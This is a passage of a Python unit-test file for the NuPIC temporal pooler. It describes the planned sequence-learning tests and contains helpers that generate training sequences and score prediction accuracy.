initialPerm = 0.8
connectedPerm = 0.7
permanenceDec = 0
permanenceInc = 0.4
Other Parameters:
numCols = 100
cellsPerCol = 1
newSynapseCount=11
activationThreshold = 8
permanenceMax = 1
Note: this is not a high order sequence, so one cell per column is fine.
Input Sequence: We train with M input sequences, each consisting of N random
patterns. Each pattern consists of a random number of bits on. The number of 1's
in each pattern should be between 21 and 25 columns. The sequences are
constructed so that consecutive patterns within a sequence don't share any
columns.
Training: The TP is trained with P passes of the M sequences. There
should be a reset between sequences. The total number of iterations during
training is P*N*M.
Testing: Run inference through the same set of sequences, with a reset before
each sequence. For each sequence the system should accurately predict the
pattern at the next time step up to and including the N-1'st pattern. A perfect
prediction consists of getting every column correct in the prediction, with no
extra columns. We report the number of columns that are incorrect and report a
failure if more than 2 columns are incorrectly predicted.
We can also calculate the number of segments and synapses that should be
learned. We raise an error if too many or too few were learned.
B1) Basic sequence learner. M=1, N=100, P=1.
B2) Same as above, except P=2. Test that permanences go up and that no
additional synapses or segments are learned.
B3) N=300, M=1, P=1. (See how high we can go with M)
B4) N=100, M=3, P=1 (See how high we can go with N*M)
B5) Like B1) but only have newSynapseCount columns ON in each pattern (instead of
between 21 and 25), and set activationThreshold to newSynapseCount.
B6) Like B1 but with cellsPerCol = 4. First order sequences should still work
just fine.
B7) Like B1 but with slower learning. Set the following parameters differently:
activationThreshold = newSynapseCount
minThreshold = activationThreshold
initialPerm = 0.2
connectedPerm = 0.7
permanenceInc = 0.2
Now we train the TP with the B1 sequence 4 times (P=4). This will increment
the permanences to be above 0.8 and at that point the inference will be correct.
This test will ensure the basic match function and segment activation rules are
working correctly.
B8) Like B7 but with 4 cells per column. Should still work.
B9) Like B7 but present the sequence less than 4 times: the inference should be
incorrect.
B10) Like B2, except that cells per column = 4. Should still add zero additional
synapses.
===============================================================================
High Order Sequences
===============================================================================
These tests ensure that high order sequences can be learned in a multiple cells
per column instantiation.
Parameters: Same as Basic First Order Tests above, but with varying cells per
column.
Input Sequence: We train with M input sequences, each consisting of N random
patterns. Each pattern consists of a random number of bits on. The number of 1's
in each pattern should be between 21 and 25 columns (except for H0). The
sequences are constructed so that consecutive patterns within a sequence don't
share any columns. The sequences are constructed to contain shared subsequences,
such as:
A B C D E F G H I J
K L M D E F N O P Q
The position and length of shared subsequences are parameters in the tests.
Training: Identical to basic first order tests above.
Testing: Identical to basic first order tests above unless noted.
We can also calculate the number of segments and synapses that should be
learned. We raise an error if too many or too few were learned.
H0) Two simple high order sequences, each of length 7, with a shared
subsequence in positions 2-4. Each pattern has a consecutive set of 5 bits on.
No pattern shares any columns with the others. These sequences are easy to
visualize and is very useful for debugging.
H1) Learn two sequences with a short shared pattern. Parameters
should be the same as B1. This test will FAIL since cellsPerCol == 1. No
consecutive patterns share any column.
H2) As above but with cellsPerCol == 4. This test should PASS. No consecutive
patterns share any column.
H2a) Same as above, except P=2. Test that permanences go up and that no
additional synapses or segments are learned.
H3) Same parameters as H.2 except sequences are created such that they share a
single significant sub-sequence. Subsequences should be reasonably long and in
the middle of sequences. No consecutive patterns share any column.
H4) Like H.3, except the shared subsequence is in the beginning. (e.g.
"ABCDEF" and "ABCGHIJ". At the point where the shared subsequence ends, all
possible next patterns should be predicted. As soon as you see the first unique
pattern, the predictions should collapse to be a perfect prediction.
H5) Shared patterns. Similar to H3 except that patterns are shared between
sequences. All sequences are different shufflings of the same set of N
patterns (there is no shared subsequence). Care should be taken such that the
same three patterns never follow one another in two sequences.
H6) Combination of H5) and H3). Shared patterns in different sequences, with a
shared subsequence.
H7) Stress test: every other pattern is shared. [Unimplemented]
H8) Start predicting in the middle of a sequence. [Unimplemented]
H9) Hub capacity. How many patterns can use that hub?
[Implemented, but does not run by default.]
H10) Sensitivity to small amounts of noise during inference. [Unimplemented]
H11) Higher order patterns with alternating elements.
Create the following 4 sequences:
A B A B A C
A B A B D E
A B F G H I
A J K L M N
After training we should verify that the expected transitions are in the
model. Prediction accuracy should be perfect. In addition, during inference,
after the first element is presented, the columns should not burst any more.
Need to verify, for the first sequence, that the high order representation
when presented with the second A and B is different from the representation
in the first presentation.
===============================================================================
Temporal Pooling Tests [UNIMPLEMENTED]
===============================================================================
Parameters: Use a "fast learning mode": With these settings sequences should be
learned in one pass:
minThreshold = newSynapseCount
globalDecay = 0
initialPerm = 0.8
connectedPerm = 0.7
permanenceDec = 0
permanenceInc = 0.4
Other Parameters:
cellsPerCol = 4
newSynapseCount=11
activationThreshold = 11
permanenceMax = 1
doPooling = True
Input Sequence: We train with M input sequences, each consisting of N random
patterns. Each pattern consists of a random number of bits on. The number of 1's
in each pattern should be between 17 and 21 columns. The sequences are
constructed so that consecutive patterns within a sequence don't share any
columns.
Note: for pooling tests the density of input patterns should be pretty low
since each pooling step increases the output density. At the same time, we need
enough bits on in the input for the temporal pooler to find enough synapses. So,
for the tests, constraints should be something like:
(Input Density) * (Number of pooling steps) < 25 %.
AND
sum(Input) > newSynapseCount*1.5
Training: The TP is trained with P passes of the M sequences. There
should be a reset between sequences. The total number of iterations during
training is P*N*M.
Testing: Run inference through the same set of sequences, with a reset before
each sequence. For each sequence the system should accurately predict the
pattern at the next P time steps, up to and including the N-P'th pattern. A
perfect prediction consists of getting every column correct in the prediction,
with no extra columns. We report the number of columns that are incorrect and
report a failure if more than 2 columns are incorrectly predicted.
P1) Train the TP two times (P=2) on a single long sequence consisting of random
patterns (N=20, M=1). There should be no overlapping columns between successive
patterns. During inference, the TP should be able reliably predict the pattern
two time steps in advance. numCols should be about 350 to meet the above
constraints and also to maintain consistency with test P2.
P2) Increase TP rate to 3 time steps in advance (P=3). At each step during
inference, the TP should be able to reliably predict the pattern coming up at
t+1, t+2, and t+3..
P3) Set segUpdateValidDuration to 2 and set P=3. This should behave almost
identically to P1. It should only predict the next time step correctly and not
two time steps in advance. (Check off by one error in this logic.)
P4) As above, but with multiple sequences.
P5) Same as P3 but with shared subsequences.
Continuous mode tests
=====================
Slow changing inputs.
Orphan Decay Tests
==================
HiLo Tests
==========
A high order sequence memory like the TP can memorize very long sequences. In
many applications though you don't want to memorize. You see a long sequence of
patterns but there are actually lower order repeating sequences embedded within
it. A simplistic example is words in a sentence. Words such as You'd like the TP to learn those sequences.
Tests should capture number of synapses learned and compare against
theoretically optimal numbers to pass/fail.
HL0a) For debugging, similar to H0. We want to learn a 3 pattern long sequence presented
with noise before and after, with no resets. Two steps of noise will be presented.
The noise will be 20 patterns, presented in random order. Every pattern has a
consecutive set of 5 bits on, so the vector will be 115 bits long. No pattern
shares any columns with the others. These sequences are easy to visualize and is
very useful for debugging.
TP parameters should be the same as B7 except that permanenceDec should be 0.05:
activationThreshold = newSynapseCount
minThreshold = activationThreshold
initialPerm = 0.2
connectedPerm = 0.7
permanenceInc = 0.2
permanenceDec = 0.05
So, this means it should learn a sequence after 4 repetitions. It will take
4 orphan decay steps to get an incorrect synapse to go away completely.
HL0b) Like HL0a, but after the 3-sequence is learned, try to learn a 4-sequence that
builds on the 3-sequence. For example, if learning A-B-C we train also on
D-A-B-C. It should learn that ABC is separate from DABC. Note: currently this
test is disabled in the code. It is a bit tricky to test this. When you present DAB,
you should predict the same columns as when you present AB (i.e. in both cases
C should be predicted). However, the representation for C in DABC should be
different than the representation for C in ABC. Furthermore, when you present
AB, the representation for C should be an OR of the representation in DABC and ABC
since you could also be starting in the middle of the DABC sequence. All this is
actually happening in the code, but verified by visual inspection only.
HL1) Noise + sequence + noise + sequence repeatedly without resets until it has
learned that sequence. Train the TP repeatedly with N random sequences that all
share a single subsequence. Each random sequence can be 10 patterns long,
sharing a subsequence that is 5 patterns long. There should be no resets
between presentations. Inference should then be on that 5 long shared subsequence.
Example (3-long shared subsequence):
A B C D E F G H I J
K L M D E F N O P Q
R S T D E F U V W X
Y Z 1 D E F 2 3 4 5
TP parameters should be the same as HL0.
HL2) Like HL1, but after A B C has learned, try to learn D A B C . It should learn
ABC is separate from DABC.
HL3) Like HL2, but test with resets.
HL4) Like HL1 but with minThreshold high. This should FAIL and learn a ton
of synapses.
HiLo but with true high order sequences embedded in noise
Present 25 sequences in random order with no resets but noise between
sequences (1-20 samples). Learn all 25 sequences. Test global decay vs non-zero
permanenceDec .
Pooling + HiLo Tests [UNIMPLEMENTED]
====================
Needs to be defined.
Global Decay Tests [UNIMPLEMENTED]
==================
Simple tests to ensure global decay is actually working.
Sequence Likelihood Tests
=========================
These tests are in the file TPLikelihood.py
Segment Learning Tests [UNIMPLEMENTED]
======================
Multi-attribute sequence tests.
SL1) Train the TP repeatedly using a single (multiple) sequence plus noise. The
sequence can be relatively short, say 20 patterns. No two consecutive patterns
in the sequence should share columns. Add random noise each time a pattern is
presented. The noise should be different for each presentation and can be equal
to the number of on bits in the pattern. After N iterations of the noisy
sequences, the TP should should achieve perfect inference on the true sequence.
There should be resets between each presentation of the sequence.
Check predictions in the sequence only. And test with clean sequences.
Vary percentage of bits that are signal vs noise.
Noise can be a fixed alphabet instead of being randomly generated.
HL2) As above, but with no resets.
Shared Column Tests [UNIMPLEMENTED]
===================
Carefully test what happens when consecutive patterns in a sequence share
columns.
Sequence Noise Tests [UNIMPLEMENTED]
====================
Note: I don't think these will work with the current logic. Need to discuss
whether we want to accommodate sequence noise like this.
SN1) Learn sequence with pooling up to T timesteps. Run inference on a sequence
and occasionally drop elements of a sequence. Inference should still work.
SN2) As above, but occasionally add a random pattern into a sequence.
SN3) A combination of the above two.
Capacity Tests [UNIMPLEMENTED]
==============
These are stress tests that verify that the temporal pooler can learn a large
number of sequences and can predict a large number of possible next steps. Some
research needs to be done first to understand the capacity of the system as it
relates to the number of columns, cells per column, etc.
Token Prediction Tests: Test how many predictions of individual tokens we can
superimpose and still recover.
Online Learning Tests [UNIMPLEMENTED]
=====================
These tests will verify that the temporal pooler continues to work even if
sequence statistics (and the actual sequences) change slowly over time. The TP
should adapt to the changes and learn to recognize newer sequences (and forget
the older sequences?).
"""
import random
import numpy
from numpy import *
import sys
import pickle
import cPickle
import pprint
from nupic.research.TP import TP
from nupic.research.TP10X2 import TP10X2
from nupic.research import fdrutilities as fdrutils
#---------------------------------------------------------------------------------
TEST_CPP_TP = 1 # temporarily disabled until it can be updated
VERBOSITY = 0 # how chatty the unit tests should be
SEED = 33 # the random seed used throughout
TPClass = TP
checkSynapseConsistency = False
rgen = numpy.random.RandomState(SEED) # always call this rgen, NOT random
#---------------------------------------------------------------------------------
# Helper routines
#--------------------------------------------------------------------------------
#---------------------------------------------------------------------------------
def printOneTrainingVector(x):
print ''.join('1' if k != 0 else '.' for k in x)
#---------------------------------------------------------------------------------
def printAllTrainingSequences(trainingSequences, upTo = 99999):
for t in xrange(min(len(trainingSequences[0]), upTo)):
print 't=',t,
for i,trainingSequence in enumerate(trainingSequences):
print "\tseq#",i,'\t',
printOneTrainingVector(trainingSequences[i][t])
#---------------------------------------------------------------------------------
def generatePattern(numCols = 100,
minOnes =21,
maxOnes =25,
colSet = [],
prevPattern =numpy.array([])):
"""Generate a single test pattern with given parameters.
Parameters:
--------------------------------------------
numCols: Number of columns in each pattern.
minOnes: The minimum number of 1's in each pattern.
maxOnes: The maximum number of 1's in each pattern.
colSet: The set of column indices for the pattern.
prevPattern: Pattern to avoid (null intersection).
"""
assert minOnes < maxOnes
assert maxOnes < numCols
nOnes = rgen.randint(minOnes, maxOnes)
candidates = list(colSet.difference(set(prevPattern.nonzero()[0])))
rgen.shuffle(candidates)
ind = candidates[:nOnes]
x = numpy.zeros(numCols, dtype='float32')
x[ind] = 1
return x
#---------------------------------------------------------------------------------
def buildTrainingSet(numSequences = 2,
sequenceLength = 100,
pctShared = 0.2,
seqGenMode = 'shared sequence',
subsequenceStartPos = 10,
numCols = 100,
minOnes=21,
maxOnes = 25,
disjointConsecutive =True):
"""Build random high order test sequences.
Parameters:
--------------------------------------------
numSequences: The number of sequences created.
sequenceLength: The length of each sequence.
pctShared: The percentage of sequenceLength that is shared across
every sequence. If sequenceLength is 100 and pctShared
is 0.2, then a subsequence consisting of 20 patterns
will be in every sequence. Can also be the keyword
'one pattern', in which case a single time step is shared.
seqGenMode: What kind of sequence to generate. If contains 'shared'
generates shared subsequence. If contains 'no shared',
does not generate any shared subsequence. If contains
'shuffle', will use common patterns shuffle among the
different sequences. If contains 'beginning', will
place shared subsequence at the beginning.
subsequenceStartPos: The position where the shared subsequence starts
numCols: Number of columns in each pattern.
minOnes: The minimum number of 1's in each pattern.
maxOnes: The maximum number of 1's in each pattern.
disjointConsecutive: Whether to generate disjoint consecutive patterns or not.
"""
# Calculate the set of column indexes once to be used in each call to generatePattern()
colSet = set(range(numCols))
if 'beginning' in seqGenMode:
assert 'shared' in seqGenMode and 'no shared' not in seqGenMode
if 'no shared' in seqGenMode or numSequences == 1:
pctShared = 0.0
#--------------------------------------------------------------------------------
# Build shared subsequence
if 'no shared' not in seqGenMode and 'one pattern' not in seqGenMode:
sharedSequenceLength = int(pctShared*sequenceLength)
elif 'one pattern' in seqGenMode:
sharedSequenceLength = 1
else:
sharedSequenceLength = 0
assert sharedSequenceLength + subsequenceStartPos < sequenceLength
sharedSequence = []
for i in xrange(sharedSequenceLength):
if disjointConsecutive and i > 0:
x = generatePattern(numCols, minOnes, maxOnes, colSet, sharedSequence[i-1])
else:
x = generatePattern(numCols, minOnes, maxOnes, colSet)
sharedSequence.append(x)
#--------------------------------------------------------------------------------
# Build random training set, splicing in the shared subsequence
trainingSequences = []
if 'beginning' not in seqGenMode:
trailingLength = sequenceLength - sharedSequenceLength - subsequenceStartPos
else:
trailingLength = sequenceLength - sharedSequenceLength
for k,s in enumerate(xrange(numSequences)):
# TODO: implement no repetitions
if len(trainingSequences) > 0 and 'shuffle' in seqGenMode:
r = range(subsequenceStartPos) \
+ range(subsequenceStartPos + sharedSequenceLength, sequenceLength)
rgen.shuffle(r)
r = r[:subsequenceStartPos] \
+ range(subsequenceStartPos, subsequenceStartPos + sharedSequenceLength) \
+ r[subsequenceStartPos:]
sequence = [trainingSequences[k-1][j] for j in r]
else:
sequence = []
if 'beginning' not in seqGenMode:
for i in xrange(subsequenceStartPos):
if disjointConsecutive and i > 0:
x = generatePattern(numCols, minOnes, maxOnes, colSet, sequence[i-1])
else:
x = generatePattern(numCols, minOnes, maxOnes, colSet)
sequence.append(x)
if 'shared' in seqGenMode and 'no shared' not in seqGenMode:
sequence.extend(sharedSequence)
for i in xrange(trailingLength):
if disjointConsecutive and i > 0:
x = generatePattern(numCols, minOnes, maxOnes, colSet, sequence[i-1])
else:
x = generatePattern(numCols, minOnes, maxOnes, colSet)
sequence.append(x)
assert len(sequence) == sequenceLength
trainingSequences.append(sequence)
assert len(trainingSequences) == numSequences
if VERBOSITY >= 2:
print "Training Sequences"
pprint.pprint(trainingSequences)
if sharedSequenceLength > 0:
return (trainingSequences, subsequenceStartPos + sharedSequenceLength)
else:
return (trainingSequences, -1)
#---------------------------------------------------------------------------------
def getSimplePatterns(numOnes, numPatterns):
"""Very simple patterns. Each pattern has numOnes consecutive
bits on. There are numPatterns*numOnes bits in the vector."""
numCols = numOnes * numPatterns
p = []
for i in xrange(numPatterns):
x = numpy.zeros(numCols, dtype='float32')
x[i*numOnes:(i+1)*numOnes] = 1
p.append(x)
return p
#---------------------------------------------------------------------------------
def buildSimpleTrainingSet(numOnes=5):
"""Two very simple high order sequences for debugging. Each pattern in the
sequence has a series of 1's in a specific set of columns."""
numPatterns = 11
p = getSimplePatterns(numOnes, numPatterns)
s1 = [p[0], p[1], p[2], p[3], p[4], p[5], p[6] ]
s2 = [p[7], p[8], p[2], p[3], p[4], p[9], p[10]]
trainingSequences = [s1, s2]
return (trainingSequences, 5)
#---------------------------------------------------------------------------------
def buildAlternatingTrainingSet(numOnes=5):
"""High order sequences that alternate elements. Pattern i has one's in
i*numOnes to (i+1)*numOnes.
The sequences are:
A B A B A C
A B A B D E
A B F G H I
A J K L M N
"""
numPatterns = 14
p = getSimplePatterns(numOnes, numPatterns)
s1 = [p[0], p[1], p[0], p[1], p[0], p[2]]
s2 = [p[0], p[1], p[0], p[1], p[3], p[4]]
s3 = [p[0], p[1], p[5], p[6], p[7], p[8]]
s4 = [p[0], p[9], p[10], p[11], p[12], p[13]]
trainingSequences = [s1, s2, s3, s4]
return (trainingSequences, 5)
#---------------------------------------------------------------------------------
def buildHL0aTrainingSet(numOnes=5):
"""Simple sequences for HL0. Each pattern in the sequence has a series of 1's
in a specific set of columns.
There are 23 patterns, p0 to p22.
The sequence we want to learn is p0->p1->p2
We create a very long sequence consisting of N N p0 p1 p2 N N p0 p1 p2
N is randomly chosen from p3 to p22
"""
numPatterns = 23
p = getSimplePatterns(numOnes, numPatterns)
s = []
s.append(p[rgen.randint(3,23)])
for _ in xrange(20):
s.append(p[rgen.randint(3,23)])
s.append(p[0])
s.append(p[1])
s.append(p[2])
s.append(p[rgen.randint(3,23)])
return ([s], [[p[0], p[1], p[2]]])
#---------------------------------------------------------------------------------
def buildHL0bTrainingSet(numOnes=5):
"""Simple sequences for HL0b. Each pattern in the sequence has a series of 1's
in a specific set of columns.
There are 23 patterns, p0 to p22.
The sequences we want to learn are p1->p2->p3 and p0->p1->p2->p4.
We create a very long sequence consisting of these two sub-sequences
intermixed with noise, such as:
N N p0 p1 p2 p4 N N p1 p2 p3 N N p1 p2 p3
N is randomly chosen from p5 to p22
"""
numPatterns = 23
p = getSimplePatterns(numOnes, numPatterns)
s = []
s.append(p[rgen.randint(5,numPatterns)])
for _ in xrange(50):
r = rgen.randint(5,numPatterns)
print r,
s.append(p[r])
if rgen.binomial(1, 0.5) > 0:
print "S1",
s.append(p[0])
s.append(p[1])
s.append(p[2])
s.append(p[4])
else:
print "S2",
s.append(p[1])
s.append(p[2])
s.append(p[3])
r = rgen.randint(5,numPatterns)
s.append(p[r])
print r,
print
return ([s], [ [p[0], p[1], p[2], p[4]], [p[1], p[2], p[3]] ])
#---------------------------------------------------------------------------------
#---------------------------------------------------------------------------------
# Basic test (creation, pickling, basic run of learning and inference)
#---------------------------------------------------------------------------------
def basicTest():
global TPClass, SEED, VERBOSITY, checkSynapseConsistency
#--------------------------------------------------------------------------------
# Create TP object
numberOfCols =10
cellsPerColumn =3
initialPerm =.2
connectedPerm =.8
minThreshold =2
newSynapseCount =5
permanenceInc =.1
permanenceDec =.05
permanenceMax =1
globalDecay =.05
activationThreshold =4 # low for those basic tests on purpose
doPooling =True
segUpdateValidDuration =5
seed =SEED
verbosity =VERBOSITY
tp = TPClass(numberOfCols, cellsPerColumn,
initialPerm, connectedPerm,
minThreshold, newSynapseCount,
permanenceInc, permanenceDec, permanenceMax,
globalDecay, activationThreshold,
doPooling, segUpdateValidDuration,
seed=seed, verbosity=verbosity,
pamLength = 1000,
checkSynapseConsistency=checkSynapseConsistency)
print "Creation ok"
#--------------------------------------------------------------------------------
# Save and reload
pickle.dump(tp, open("test_tp.pkl", "wb"))
tp2 = pickle.load(open("test_tp.pkl"))
assert tp2.numberOfCols == numberOfCols
assert tp2.cellsPerColumn == cellsPerColumn
print tp2.initialPerm
assert tp2.initialPerm == numpy.float32(.2)
assert tp2.connectedPerm == numpy.float32(.8)
assert tp2.minThreshold == minThreshold
assert tp2.newSynapseCount == newSynapseCount
assert tp2.permanenceInc == numpy.float32(.1)
assert tp2.permanenceDec == numpy.float32(.05)
assert tp2.permanenceMax == 1
assert tp2.globalDecay == numpy.float32(.05)
assert tp2.activationThreshold == activationThreshold
assert tp2.doPooling == doPooling
assert tp2.segUpdateValidDuration == segUpdateValidDuration
assert tp2.seed == SEED
assert tp2.verbosity == verbosity
print "Save/load ok"
#--------------------------------------------------------------------------------
# Learn
for i in xrange(5):
xi = rgen.randint(0,2,(numberOfCols))
x = numpy.array(xi, dtype="uint32")
y = tp.learn(x)
#--------------------------------------------------------------------------------
# Infer
patterns = rgen.randint(0,2,(4,numberOfCols))
for i in xrange(10):
xi = rgen.randint(0,2,(numberOfCols))
x = numpy.array(xi, dtype="uint32")
y = tp.infer(x)
if i > 0:
p = tp.checkPrediction2([pattern.nonzero()[0] for pattern in patterns])
print "basicTest ok"
#---------------------------------------------------------------------------------
# Figure out acceptable patterns if none were passed to us.
def findAcceptablePatterns(tp, t, whichSequence, trainingSequences, nAcceptable = 1):
"""
Tries to infer the set of acceptable patterns for prediction at the given
time step and for the give sequence. Acceptable patterns are: the current one,
plus a certain number of patterns after timeStep, in the sequence that the TP
is currently tracking. Any other pattern is not acceptable.
TODO:
====
- Doesn't work for noise cases.
- Might run in trouble if shared subsequence at the beginning.
Parameters:
==========
tp the whole TP, so that we can look at its parameters
t the current time step
whichSequence the sequence we are currently tracking
trainingSequences all the training sequences
nAcceptable the number of steps forward from the current timeStep
we are willing to consider acceptable. In the case of
pooling, it is less than or equal to the min of the
number of training reps and the segUpdateValidDuration
parameter of the TP, depending on the test case.
The default value is 1, because by default, the pattern
after the current one should always be predictable.
Return value:
============
acceptablePatterns A list of acceptable patterns for prediction.
"""
# Determine how many steps forward we want to see in the prediction
upTo = t + 2 # always predict current and next
# If the TP is pooling, more steps can be predicted
if tp.doPooling:
upTo += min(tp.segUpdateValidDuration, nAcceptable)
assert upTo <= len(trainingSequences[whichSequence])
acceptablePatterns = []
# Check whether we were in a shared subsequence at the beginning.
# If so, at the point of exiting the shared subsequence (t), we should
# be predicting multiple patterns for 1 time step, then collapse back
# to a single sequence.
if len(trainingSequences) == 2 and \
(trainingSequences[0][0] == trainingSequences[1][0]).all():
if (trainingSequences[0][t] == trainingSequences[1][t]).all() \
and (trainingSequences[0][t+1] != trainingSequences[1][t+1]).any():
acceptablePatterns.append(trainingSequences[0][t+1])
acceptablePatterns.append(trainingSequences[1][t+1])
# Add patterns going forward
acceptablePatterns += [trainingSequences[whichSequence][t] \
for t in xrange(t,upTo)]
return acceptablePatterns
#---------------------------------------------------------------------------------
def testSequence(trainingSequences,
nTrainingReps = 1,
numberOfCols = 40,
cellsPerColumn =5,
initialPerm =.8,
connectedPerm =.7,
minThreshold = 11,
newSynapseCount =5,
permanenceInc =.4,
permanenceDec =0.0,
permanenceMax =1,
globalDecay =0.0,
pamLength = 1000,
activationThreshold =5,
acceptablePatterns = [], # if empty, try to infer what they are
doPooling = False,
nAcceptable = -1, # if doPooling, number of acceptable steps
noiseModel = None,
noiseLevel = 0,
doResets = True,
shouldFail = False,
testSequences = None,
predJustAfterHubOnly = None,
compareToPy = False,
nMultiStepPrediction = 0,
highOrder = False):
"""Test a single set of sequences once and return the number of
prediction failures, the number of errors, and the number of perfect
predictions"""
global TP, SEED, checkSynapseConsistency, VERBOSITY
numPerfect = 0 # When every column is correct in the prediction
numStrictErrors = 0 # When at least one column is incorrect
numFailures = 0 # When > 2 columns are incorrect
sequenceLength = len(trainingSequences[0])
segUpdateValidDuration =5
verbosity = VERBOSITY
# override default maxSeqLEngth value for high-order sequences
if highOrder:
tp = TPClass(numberOfCols, cellsPerColumn,
initialPerm, connectedPerm,
minThreshold, newSynapseCount,
permanenceInc, permanenceDec, permanenceMax,
globalDecay, activationThreshold,
doPooling, segUpdateValidDuration,
seed=SEED, verbosity=verbosity,
checkSynapseConsistency=checkSynapseConsistency,
pamLength=pamLength,
maxSeqLength=0
)
else:
tp = TPClass(numberOfCols, cellsPerColumn,
initialPerm, connectedPerm,
minThreshold, newSynapseCount,
permanenceInc, permanenceDec, permanenceMax,
globalDecay, activationThreshold,
doPooling, segUpdateValidDuration,
seed=SEED, verbosity=verbosity,
checkSynapseConsistency=checkSynapseConsistency,
pamLength=pamLength
)
if compareToPy:
# override default maxSeqLEngth value for high-order sequences
if highOrder:
py_tp = TP(numberOfCols, cellsPerColumn,
initialPerm, connectedPerm,
minThreshold, newSynapseCount,
permanenceInc, permanenceDec, permanenceMax,
globalDecay, activationThreshold,
doPooling, segUpdateValidDuration,
seed=SEED, verbosity=verbosity,
pamLength=pamLength,
maxSeqLength=0
)
else:
py_tp = TP(numberOfCols, cellsPerColumn,
initialPerm, connectedPerm,
minThreshold, newSynapseCount,
permanenceInc, permanenceDec, permanenceMax,
globalDecay, activationThreshold,
doPooling, segUpdateValidDuration,
seed=SEED, verbosity=verbosity,
pamLength=pamLength,
)
trainingSequences = trainingSequences[0]
if testSequences == None: testSequences = trainingSequences
inferAcceptablePatterns = acceptablePatterns == []
#--------------------------------------------------------------------------------
# Learn
for r in xrange(nTrainingReps):
if VERBOSITY > 1:
print "============= Learning round",r,"================="
for sequenceNum, trainingSequence in enumerate(trainingSequences):
if VERBOSITY > 1:
print "============= New sequence ================="
if doResets:
tp.reset()
if compareToPy:
py_tp.reset()
for t,x in enumerate(trainingSequence):
if noiseModel is not None and \
'xor' in noiseModel and 'binomial' in noiseModel \
and 'training' in noiseModel:
noise_vector = rgen.binomial(len(x), noiseLevel, (len(x)))
x = logical_xor(x, noise_vector)
if VERBOSITY > 2:
print "Time step",t, "learning round",r, "sequence number", sequenceNum
print "Input: ",tp.printInput(x)
print "NNZ:", x.nonzero()
x = numpy.array(x).astype('float32')
y = tp.learn(x)
if compareToPy:
py_y = py_tp.learn(x)
if t % 25 == 0: # To track bugs, do that every iteration, but very slow
assert fdrutils.tpDiff(tp, py_tp, VERBOSITY) == True
if VERBOSITY > 3:
tp.printStates(printPrevious = (VERBOSITY > 4))
print
if VERBOSITY > 3:
print "Sequence finished. Complete state after sequence"
tp.printCells()
print
numPerfectAtHub = 0
if compareToPy:
print "End of training"
assert fdrutils.tpDiff(tp, py_tp, VERBOSITY) == True
#--------------------------------------------------------------------------------
# Infer
if VERBOSITY > 1: print "============= Inference ================="
for s,testSequence in enumerate(testSequences):
if VERBOSITY > 1: print "============= New sequence ================="
if doResets:
tp.reset()
if compareToPy:
py_tp.reset()
slen = len(testSequence)
for t,x in enumerate(testSequence):
# Generate noise (optional)
if noiseModel is not None and \
'xor' in noiseModel and 'binomial' in noiseModel \
and 'inference' in noiseModel:
noise_vector = rgen.binomial(len(x), noiseLevel, (len(x)))
x = logical_xor(x, noise_vector)
if VERBOSITY > 2: print "Time step",t, '\nInput:', tp.printInput(x)
x = numpy.array(x).astype('float32')
y = tp.infer(x)
if compareToPy:
py_y = py_tp.infer(x)
assert fdrutils.tpDiff(tp, py_tp, VERBOSITY) == True
# if t == predJustAfterHubOnly:
# z = sum(y, axis = 1)
# print '\t\t',
# print ''.join('.' if z[i] == 0 else '1' for i in xrange(len(z)))
if VERBOSITY > 3: tp.printStates(printPrevious = (VERBOSITY > 4),
printLearnState = False); print
if nMultiStepPrediction > 0:
y_ms = tp.predict(nSteps=nMultiStepPrediction)
if VERBOSITY > 3:
print "Multi step prediction at Time step", t
for i in range(nMultiStepPrediction):
print "Prediction at t+", i+1
tp.printColConfidence(y_ms[i])
# Error Checking
for i in range(nMultiStepPrediction):
predictedTimeStep = t+i+1
if predictedTimeStep < slen:
input = testSequence[predictedTimeStep].nonzero()[0]
prediction = y_ms[i].nonzero()[0]
foundInInput, totalActiveInInput, \
missingFromInput, totalActiveInPrediction = \
fdrutils.checkMatch(input, prediction, sparse=True)
falseNegatives = totalActiveInInput - foundInInput
falsePositives = missingFromInput
if VERBOSITY > 2:
print "Predition from %d to %d" % (t, t+i+1)
print "\t\tFalse Negatives:", falseNegatives
print "\t\tFalse Positivies:", falsePositives
if falseNegatives > 0 or falsePositives > 0:
numStrictErrors += 1
if falseNegatives > 0 and VERBOSITY > 1:
print "Multi step prediction from t=", t, "to t=", t+i+1,\
"false negative with error=",falseNegatives,
print "out of", totalActiveInInput,"ones"
if falsePositives > 0 and VERBOSITY > 1:
print "Multi step prediction from t=", t, "to t=", t+i+1,\
"false positive with error=",falsePositives,
print "out of",totalActiveInInput,"ones"
if falsePositives > 3 or falseNegatives > 3:
numFailures += 1
# Analyze the failure if we care about it
if VERBOSITY > 1 and not shouldFail:
print 'Input at t=', t
print '\t\t',; printOneTrainingVector(testSequence[t])
print 'Prediction for t=', t+i+1
print '\t\t',; printOneTrainingVector(y_ms[i])
print 'Actual input at t=', t+i+1
print '\t\t',; printOneTrainingVector(testSequence[t+i+1])
if t < slen-1:
# If no acceptable patterns were passed to us, we need to infer them
# for the current sequence and time step by looking at the testSequences.
# nAcceptable is used to reduce the number of automatically determined
# acceptable patterns.
if inferAcceptablePatterns:
acceptablePatterns = findAcceptablePatterns(tp, t, s, testSequences,
nAcceptable)
scores = tp.checkPrediction2([pattern.nonzero()[0] \
for pattern in acceptablePatterns])
falsePositives, falseNegatives = scores[0], scores[1]
# We report an error if FN or FP is > 0.
# We report a failure if number of FN or number of FP is > 2 for any
# pattern. We also count the number of perfect predictions.
if falseNegatives > 0 or falsePositives > 0:
numStrictErrors += 1
if falseNegatives > 0 and VERBOSITY > 1:
print "Pattern",s,"time",t,\
"prediction false negative with error=",falseNegatives,
print "out of",int(testSequence[t+1].sum()),"ones"
if falsePositives > 0 and VERBOSITY > 1:
print "Pattern",s,"time",t,\
"prediction false positive with error=",falsePositives,
print "out of",int(testSequence[t+1].sum()),"ones"
if falseNegatives > 3 or falsePositives > 3:
numFailures += 1
# Analyze the failure if we care about it
if VERBOSITY > 1 and not shouldFail:
print 'Test sequences'
if len(testSequences) > 1:
printAllTrainingSequences(testSequences, t+1)
else:
print '\t\t',; printOneTrainingVector(testSequence[t])
print '\t\t',; printOneTrainingVector(testSequence[t+1])
print 'Acceptable'
for p in acceptablePatterns:
print '\t\t',; printOneTrainingVector(p)
print 'Output'
diagnostic = ''
output = sum(tp.currentOutput,axis=1)
print '\t\t',; printOneTrainingVector(output)
else:
numPerfect += 1
if predJustAfterHubOnly is not None and predJustAfterHubOnly == t:
numPerfectAtHub += 1
if predJustAfterHubOnly is None:
return numFailures, numStrictErrors, numPerfect, tp
else:
return numFailures, numStrictErrors, numPerfect, numPerfectAtHub, tp
#---------------------------------------------------------------------------------
